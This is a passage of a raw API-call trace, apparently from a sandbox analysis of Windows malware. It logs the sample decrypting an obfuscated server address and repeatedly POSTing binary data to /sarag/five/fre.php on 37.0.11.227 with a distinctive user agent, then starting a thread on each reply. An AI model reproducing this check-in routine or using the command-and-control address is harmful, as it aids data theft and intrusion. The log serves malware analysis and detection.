(lpLibFileName="user32") returned 0x755e0000 [0232.646] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0232.646] GetProcessHeap () returned 0x690000 [0232.646] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0232.646] GetProcessHeap () returned 0x690000 [0232.647] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0232.647] send (s=0x610, buf=0x6ad508*, len=242, flags=0) returned 242 [0232.647] send (s=0x610, buf=0x6aba40*, len=159, flags=0) returned 159 [0232.647] GetProcessHeap () returned 0x690000 [0232.648] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0232.648] recv (in: s=0x610, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0235.895] GetProcessHeap () returned 0x690000 [0235.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0235.896] GetProcessHeap () returned 0x690000 [0235.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0235.896] GetProcessHeap () returned 0x690000 [0235.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0235.896] GetProcessHeap () returned 0x690000 [0235.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0235.897] closesocket (s=0x610) returned 0 [0235.897] GetProcessHeap () returned 0x690000 [0235.897] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0235.898] GetProcessHeap () returned 0x690000 [0235.898] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0235.898] GetProcessHeap () returned 0x690000 [0235.898] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0235.899] GetProcessHeap () returned 0x690000 [0235.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0235.900] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe74) returned 0x610 [0235.903] Sleep (dwMilliseconds=0xea60) [0235.909] GetProcessHeap () returned 0x690000 [0235.909] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0235.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0235.911] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0235.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0235.921] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0235.927] GetProcessHeap () returned 0x690000 [0235.927] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0235.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0235.928] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0235.930] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0235.930] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0235.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0235.931] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0235.931] GetProcessHeap () returned 0x690000 [0235.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0235.932] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0235.933] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0236.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0236.352] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0236.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0236.353] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0236.353] GetProcessHeap () returned 0x690000 [0236.353] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0236.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0236.519] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0236.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0236.521] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0236.521] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0236.522] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0236.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0236.523] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0236.523] GetProcessHeap () returned 0x690000 [0236.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0236.523] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0236.523] GetProcessHeap () returned 0x690000 [0236.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0236.524] GetProcessHeap () returned 0x690000 [0236.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0236.524] GetProcessHeap () returned 0x690000 [0236.524] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0236.524] GetProcessHeap () returned 0x690000 [0236.525] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0236.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0236.526] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0236.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0236.542] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0236.667] GetProcessHeap () returned 0x690000 [0236.667] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0236.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0236.668] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0236.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0236.669] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0236.670] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0236.670] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0236.670] GetProcessHeap () returned 0x690000 [0236.671] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0236.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0236.673] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0236.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0236.674] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0236.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0236.676] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0236.676] GetProcessHeap () returned 0x690000 [0236.676] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0236.676] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0236.677] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0236.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0236.678] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0236.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0236.679] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0236.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0236.680] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0236.680] GetProcessHeap () returned 0x690000 [0236.680] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0236.680] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0236.680] GetProcessHeap () returned 0x690000 [0236.680] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0236.680] socket (af=2, type=1, protocol=6) returned 0x614 [0236.680] connect (s=0x614, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0236.791] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0236.791] GetProcessHeap () returned 0x690000 [0236.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0236.791] GetProcessHeap () returned 0x690000 [0236.791] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0236.792] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0236.793] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0236.793] GetProcessHeap () returned 0x690000 [0236.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0236.793] GetProcessHeap () returned 0x690000 [0236.793] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0236.793] GetProcessHeap () returned 0x690000 [0236.793] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0236.794] GetProcessHeap () returned 0x690000 [0236.794] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0236.794] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0236.795] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0236.795] GetProcessHeap () returned 0x690000 [0236.795] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0236.795] GetProcessHeap () returned 0x690000 [0236.795] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0236.795] send (s=0x614, buf=0x6ad508*, len=242, flags=0) returned 242 [0236.796] send (s=0x614, buf=0x6aba40*, len=159, flags=0) returned 159 [0236.796] GetProcessHeap () returned 0x690000 [0236.796] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0236.796] recv (in: s=0x614, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0236.926] GetProcessHeap () returned 0x690000 [0236.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0236.927] GetProcessHeap () returned 0x690000 [0236.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0236.928] GetProcessHeap () returned 0x690000 [0236.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0236.928] GetProcessHeap () returned 0x690000 [0236.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0236.928] closesocket (s=0x614) returned 0 [0236.929] GetProcessHeap () returned 0x690000 [0236.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0236.929] GetProcessHeap () returned 0x690000 [0236.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0236.929] GetProcessHeap () returned 0x690000 [0236.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0236.930] GetProcessHeap () returned 0x690000 [0236.930] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0236.930] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa04) returned 0x614 [0236.938] Sleep (dwMilliseconds=0xea60) [0236.939] GetProcessHeap () returned 0x690000 [0236.939] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0236.940] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0236.941] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0236.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0236.953] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0237.104] GetProcessHeap () returned 0x690000 [0237.104] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0237.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.106] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0237.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.107] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.108] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.108] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.108] GetProcessHeap () returned 0x690000 [0237.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0237.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.110] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0237.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.213] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0237.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.214] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0237.214] GetProcessHeap () returned 0x690000 [0237.214] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0237.215] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.216] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0237.216] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.218] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0237.219] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.220] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0237.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.221] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0237.221] GetProcessHeap () returned 0x690000 [0237.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0237.225] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0237.226] GetProcessHeap () returned 0x690000 [0237.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0237.226] GetProcessHeap () returned 0x690000 [0237.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0237.227] GetProcessHeap () returned 0x690000 [0237.227] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0237.227] GetProcessHeap () returned 0x690000 [0237.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0237.230] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.231] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0237.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.237] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0237.247] GetProcessHeap () returned 0x690000 [0237.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0237.247] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.248] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0237.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.249] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0237.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.250] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0237.250] GetProcessHeap () returned 0x690000 [0237.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0237.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.252] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0237.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.253] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0237.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0237.254] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0237.254] GetProcessHeap () returned 0x690000 [0237.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0237.255] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.255] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0237.256] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.256] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0237.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.257] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0237.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0237.259] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0237.259] GetProcessHeap () returned 0x690000 [0237.259] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0237.259] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0237.259] GetProcessHeap () returned 0x690000 [0237.259] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0237.259] socket (af=2, type=1, protocol=6) returned 0x618 [0237.259] connect (s=0x618, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0237.283] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0237.283] GetProcessHeap () returned 0x690000 [0237.284] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aed48 [0237.284] GetProcessHeap () returned 0x690000 [0237.284] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0237.284] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0237.285] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0237.285] GetProcessHeap () returned 0x690000 [0237.285] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0237.285] GetProcessHeap () returned 0x690000 [0237.286] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0237.286] GetProcessHeap () returned 0x690000 [0237.286] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0237.286] GetProcessHeap () returned 0x690000 [0237.286] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0237.287] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0237.288] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0237.288] GetProcessHeap () returned 0x690000 [0237.288] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0237.288] GetProcessHeap () returned 0x690000 [0237.289] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0237.289] send (s=0x618, buf=0x6ad508*, len=242, flags=0) returned 242 [0237.290] send (s=0x618, buf=0x6aba40*, len=159, flags=0) returned 159 [0237.290] GetProcessHeap () returned 0x690000 [0237.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0237.290] recv (in: s=0x618, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0237.365] GetProcessHeap () returned 0x690000 [0237.365] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0237.365] GetProcessHeap () returned 